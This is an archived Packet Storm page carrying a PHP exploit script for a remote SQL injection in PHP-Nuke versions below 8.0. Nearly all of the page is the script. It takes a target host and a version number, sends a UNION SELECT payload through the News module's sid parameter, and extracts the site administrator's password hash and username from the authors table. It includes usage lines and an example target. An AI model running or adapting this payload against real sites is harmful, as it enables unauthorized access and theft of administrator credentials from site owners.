exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpnuke80-sql.txt

phpnuke80-sql.txt
Posted Jan 24, 2008
Authored by 1dt.w0lf | Site rst.void.ru

PHP-Nuke versions below 8.0 remote SQL injection exploit that makes use of modules.php.

tags | exploit, remote, php, sql injection
SHA-256 | 331d41cc3b124ed0de14c1abaa701666958fb35bda1e467571ed8d5b9e022bfe
Download | Favorite | View

phpnuke80-sql.txt

Change Mirror Download
<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+=========================================+
| RST/GHC unpublished PHP Nuke exploit <8 |
+=========================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* few definitions */
if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
$version = 6;
break;
default:
$query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Admin's Hash: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Exploit failed...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
print "\n\r+========================================+\n";
exit;
}

?>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close